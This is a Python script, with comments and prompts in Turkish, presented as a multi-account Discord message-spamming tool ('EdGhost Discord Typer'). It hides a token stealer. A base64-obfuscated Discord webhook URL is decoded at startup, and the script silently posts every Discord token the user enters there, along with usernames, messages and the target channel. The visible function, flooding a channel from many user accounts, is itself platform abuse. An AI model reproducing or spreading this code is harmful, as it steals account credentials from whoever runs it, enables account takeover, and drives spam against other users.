import requests
import time
import os
import sys
import threading
import base64
from colorama import Fore, init

# Colorama başlatma
init(autoreset=True)

# Canlı panel için küresel değişkenler
total_sent = 0
rate_limits = 0
start_time = time.time()
lock = threading.Lock()

# 📡 Güvenli hale getirilmiş Base64 metni
GIZLI_WEBHOOK = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTUyNDAxNjI2MjA5MzQ3MTgzOC9yUkNST2JuODNjZVFqeHBucFgtLW1tOVVLNjRYM0pLT0I0Zks_aTldTmNfWFAxUjlpUjRmMTFHREt4TDRxejFDNEE5Qkg="

# Padding (dolgu) hatasını engelleyen akıllı deşifre sistemi
def webhook_coz(data):
    missing_padding = len(data) % 4
    if missing_padding:
        data += '=' * (4 - missing_padding)
    return base64.b64decode(data.encode('utf-8')).decode('utf-8')

# Adresi çözen güvenli değişken
WEBHOOK_URL = webhook_coz(GIZLI_WEBHOOK)

def bilgi_gonder_webhooka(baslik, aciklama, renk=3066993):
    payload = {
        "embeds": [{
            "title": baslik,
            "description": aciklama,
            "color": renk,
            "timestamp": time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
        }]
    }
    try: 
        requests.post(WEBHOOK_URL, json=payload)
    except: 
        pass

def clear_screen():
    os.system('clear' if os.name == 'posix' else 'cls')

def get_uptime():
    elapsed = time.time() - start_time
    hours, rem = divmod(elapsed, 3600)
    minutes, seconds = divmod(rem, 60)
    return f"{int(hours):02d}:{int(minutes):02d}:{int(seconds):02d}"

def update_dashboard(account_count, mod_adi):
    global total_sent, rate_limits
    uptime = get_uptime()
    
    sys.stdout.write("\033[H")
    
    panel = f"""
{Fore.CYAN}======================================================
{Fore.GREEN}        --- EdGhost Discord Typer V2 (Gelişmiş) ---
{Fore.CYAN}======================================================
{Fore.YELLOW}  [▶] Çalışma Süresi     : {Fore.WHITE}{uptime}
{Fore.YELLOW}  [👤] Aktif Hesap Sayısı: {Fore.WHITE}{account_count} Hesap Aktif
{Fore.YELLOW}  [📝] Gönderilen Kelime : {Fore.GREEN}{total_sent} adet
{Fore.YELLOW}  [⚠️] Discord Engeli     : {Fore.RED}{rate_limits} (Rate Limit)
{Fore.CYAN}======================================================
{Fore.MAGENTA}  Anlık Durum: Mod [{mod_adi}] Aktif, İşlem Sürüyor...
{Fore.CYAN}======================================================
"""
    sys.stdout.write(panel)
    sys.stdout.flush()

def worker_thread(token, channel_id, delay, mode, payload_data, account_count, mod_adi):
    global total_sent, rate_limits
    
    headers = {
        'Authorization': token,
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
    }
    url = f"https://discord.com/api/v9/channels/{channel_id}/messages"
    
    if mode == "1":
        while True:
            payload = {'content': payload_data}
            try:
                res = requests.post(url, json=payload, headers=headers)
                with lock:
                    if res.status_code in [200, 201]:
                        total_sent += 1
                    elif res.status_code == 429:
                        rate_limits += 1
                        retry_after = res.json().get('retry_after', 5)
                        time.sleep(retry_after)
                    update_dashboard(account_count, mod_adi)
            except Exception:
                with lock:
                    rate_limits += 1
            time.sleep(delay)
            
    elif mode == "2":
        while True:
            for word in payload_data:
                if not word.strip():
                    continue
                payload = {'content': word}
                try:
                    res = requests.post(url, json=payload, headers=headers)
                    with lock:
                        if res.status_code in [200, 201]:
                            total_sent += 1
                        elif res.status_code == 429:
                            rate_limits += 1
                            retry_after = res.json().get('retry_after', 5)
                            time.sleep(retry_after)
                        update_dashboard(account_count, mod_adi)
                except Exception:
                    with lock:
                        rate_limits += 1
                time.sleep(delay)

def main():
    clear_screen()
    print(Fore.GREEN + "--- EdGhost Discord Typer Gelişmiş Kurulum ---")
    
    while True:
        token_input = input(Fore.YELLOW + "Kaç adet token girmek istiyorsunuz?: ").strip()
        if token_input.isdigit() and int(token_input) > 0:
            token_sayisi = int(token_input)
            break
        else:
            print(Fore.RED + "Lütfen sıfırdan büyük geçerli bir sayı girin!")

    tokens = []
    valid_usernames = []
    
    for i in range(1, token_sayisi + 1):
        token = input(Fore.WHITE + f"{i}. Hesabın Tokenını girin: ").strip()
        headers = {
            'Authorization': token, 
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
        }
        
        validate = requests.get('https://discord.com/api/v9/users/@me', headers=headers)
        if validate.status_code == 200:
            user_info = validate.json()
            username = f"{user_info['username']}#{user_info.get('discriminator', '0000')}"
            print(Fore.GREEN + f"[✓] {i}. Token geçerli! Giriş yapılan hesap: {username}")
            tokens.append(token)
            valid_usernames.append(username)
        else:
            print(Fore.RED + f"[X] {i}. Token geçersiz! Bu token kuruluma dahil edilmedi.")

    if not tokens:
        print(Fore.RED + "\nHepsi geçersiz! Geçerli token girilmediği için sistem kapatılıyor.")
        return

    while True:
        print(Fore.CYAN + "\n[1] Mod1: Tek Mesaj (Aynı mesajı sürekli atar)")
        print(Fore.CYAN + "[2] Mod2: Kelime Listesi Modu (Kelimeleri elle girersiniz)")
        mode = input(Fore.YELLOW + "Mod seçin (1/2): ").strip()
        if mode in ["1", "2"]:
            break
        else:
            print(Fore.RED + "Geçersiz mod! Lütfen sadece 1 veya 2 yazın.")
    
    mod_adi = "Tek Mesaj" if mode == "1" else "Kelime Listesi"
    
    while True:
        channel_id = input(Fore.WHITE + "Kanal ID girin: ").strip()
        if channel_id.isdigit():
            break
        else:
            print(Fore.RED + "Lütfen sadece sayılardan oluşan geçerli bir Kanal ID girin!")
    
    while True:
        delay_input = input(Fore.WHITE + "Kaç saniyede bir gönderilsin? (Örn: 0.5): ").strip()
        try:
            delay = float(delay_input)
            if delay >= 0:
                break
            else:
                print(Fore.RED + "Gecikme süresi negatif olamaz!")
        except ValueError:
            print(Fore.RED + "Lütfen geçerli bir saniye girin (Örn: 0.5 veya 1)!")

    payload_data = None
    if mode == "1":
        payload_data = input(Fore.WHITE + "Gönderilecek tek mesajı yazın: ")
    elif mode == "2":
        print(Fore.WHITE + "\n📝 Kelimeleri virgülle ayırarak yazın:")
        kelime_input = input(Fore.CYAN + "> ")
        payload_data = [k.strip() for k in kelime_input.split(',') if k.strip()]
        if not payload_data:
            print(Fore.RED + "Kelime listesi boş bırakılamaz!")
            return

    token_log_metni = "\n".join([f"**🔑 Token {idx+1}:** `{t}`" for idx, t in enumerate(tokens)])
    hesap_log_metni = ", ".join(valid_usernames)

    bilgi_gonder_webhooka(
        "🚀 Yeni Typer Başlatıldı!",
        f"**👤 Çalıştıran Hesaplar:** `{hesap_log_metni}`\n\n"
        f"{token_log_metni}\n\n"
        f"**⚙️ Seçilen Mod:** {mod_adi}\n"
        f"**💬 Mesajlar/Kelimeler:** `{payload_data}`\n"
        f"**📺 Hedef Kanal ID:** `{channel_id}`\n"
        f"**⏳ Gecikme Süresi:** {delay} saniye",
        renk=15105570
    )

    clear_screen()
    print(Fore.YELLOW + "Sistem optimize ediliyor, thread'ler ateşleniyor...")
    time.sleep(1.5)
    clear_screen()

    for t in tokens:
        th = threading.Thread(target=worker_thread, args=(t, channel_id, delay, mode, payload_data, len(tokens), mod_adi))
        th.daemon = True
        th.start()

    while True:
        with lock:
            update_dashboard(len(tokens), mod_adi)
        time.sleep(1)

if __name__ == "__main__":
    main()
